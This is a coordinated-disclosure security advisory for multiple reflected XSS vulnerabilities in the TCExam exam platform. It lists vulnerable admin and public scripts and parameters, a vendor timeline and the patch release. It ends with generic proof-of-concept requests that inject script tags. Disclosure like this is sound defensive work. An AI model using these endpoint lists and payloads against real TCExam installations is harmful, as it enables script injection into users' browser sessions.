TCExam <=11.2.011 Multiple Cross-Site Scripting Vulnerabilities


Vendor: Tecnik.com s.r.l.
Product web page: http://www.tcexam.org
Affected version: 11.2.009, 11.2.010 and 11.2.011

Summary: TCExam is a FLOSS system for electronic exams (also know as
CBA - Computer-Based Assessment, CBT - Computer-Based Testing or e-exam)
that enables educators and trainers to author, schedule, deliver, and
report on quizzes, tests and exams.

Desc: TCExam suffers from multiple pre and post auth XSS vulnerabilities
when parsing user input to multiple parameters via GET and POST method in
multiple scripts. Attackers can exploit these weaknesses to execute arbitrary
HTML and script code in a user's browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab


High five to Dr. Nicola Asuni!


Vendor status:

[09.07.2011] Vulnerability discovered.
[10.07.2011] Initial contact with the vendor.
[11.07.2011] Vendor responds asking more details.
[11.07.2011] Sent details to vendor.
[12.07.2011] Vendor confirms the issues.
[12.07.2011] Working with the vendor.
[13.07.2011] Vendor releases version 11.2.012 to address these issues.
[13.07.2011] Coordinated public security advisory released.


Advisory ID: ZSL-2011-5025
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5025.php

Vendor Patch: http://sourceforge.net/projects/tcexam/files/tcexam_11_2_012.zip
Vendor Changelog: http://sourceforge.net/projects/tcexam/files/CHANGELOG.TXT



09.07.2011


--


********** Cross-Site Scripting Reflected (script name / parameter(s) / http method) **********

1.  /admin/code/tce_colorpicker.php            (frm, fld, tag)                                     - GET
2.  /admin/code/tce_edit_backup.php            (backup_file)                                       - POST
3.  /admin/code/tce_edit_group.php             (group_name, group_id)                              - POST
4.  /admin/code/tce_edit_module.php            (module_id, module_user_id)                         - POST
5.  /admin/code/tce_edit_rating.php            (test_id)                                           - POST
6.  /admin/code/tce_edit_subject.php           (subject_module_id, subject_id)                     - POST
7.  /admin/code/tce_edit_test.php              (test_id)                                           - POST
8.  /admin/code/tce_filemanager.php            (file)                                              - POST
9.  /admin/code/tce_select_mediafile.php       (frm, fld, file)                                    - GET, GET, POST
10. /admin/code/tce_select_users.php           (new_group_id)                                      - POST
11. /admin/code/tce_show_all_questions.php     (subject_module_id)                                 - POST
12. /admin/code/tce_show_result_user.php       (test_id)                                           - POST
13. /public/code/tce_user_change_email.php     (xl_user_email)                                     - POST
14. /public/code/tce_user_change_password.php  (xl_newpassword)                                    - POST
15. /public/code/tce_user_registration.php     (xl_user_email, xl_newpassword, xl_user_birthdate)  - POST


********** Cross-Site Scripting URI Based (script name) **********

1.  /admin/code/index.php 
2.  /admin/code/tce_csv_users.php 
3.  /admin/code/tce_edit_answer.php 
4.  /admin/code/tce_edit_backup.php 
5.  /admin/code/tce_edit_group.php 
6.  /admin/code/tce_edit_module.php 
7.  /admin/code/tce_edit_question.php 
8.  /admin/code/tce_edit_rating.php 
9.  /admin/code/tce_edit_subject.php 
10. /admin/code/tce_edit_test.php 
11. /admin/code/tce_edit_user.php 
12. /admin/code/tce_filemanager.php 
13. /admin/code/tce_import_omr_answers.php 
14. /admin/code/tce_import_xml_questions.php 
15. /admin/code/tce_import_xml_users.php 
16. /admin/code/tce_menu_modules.php 
17. /admin/code/tce_menu_tests.php 
18. /admin/code/tce_menu_users.php 
19. /admin/code/tce_page_info.php 
20. /admin/code/tce_select_mediafile.php 
21. /admin/code/tce_select_users.php 
22. /admin/code/tce_show_all_questions.php 
23. /admin/code/tce_show_allresults_users.php 
24. /admin/code/tce_show_online_users.php 
25. /admin/code/tce_show_result_allusers.php 
26. /admin/code/tce_show_result_questions.php 
27. /admin/code/tce_show_result_user.php 
28. /admin/code/tce_xml_users.php 
29. /public/code/index.php 
30. /public/code/tce_page_user.php 
31. /public/code/tce_user_change_email.php 
32. /public/code/tce_user_change_password.php 
33. /public/code/tce_user_registration.php 


********** Cross-Site Scripting in path (script name) **********

1. /admin/code
2. /public/code


-------------------------------------------------



XSS:  GET http://localhost/tcexam/admin/code/{script}.php?{parameter}={value}"><script>alert(1)</script>

XSS:  POST http://localhost/tcexam/admin/code/{script}.php HTTP/1.0
       - {parameter}={value}<script>alert(1)</script>&{parameter}={value}

XSS URI: GET http://localhost/tcexam/admin/code/index.php?zsl=>"><script>alert(1)</script>

XSS Path: GET http://localhost/tcexam/admin/code/?=>"'><script>alert(1)</script>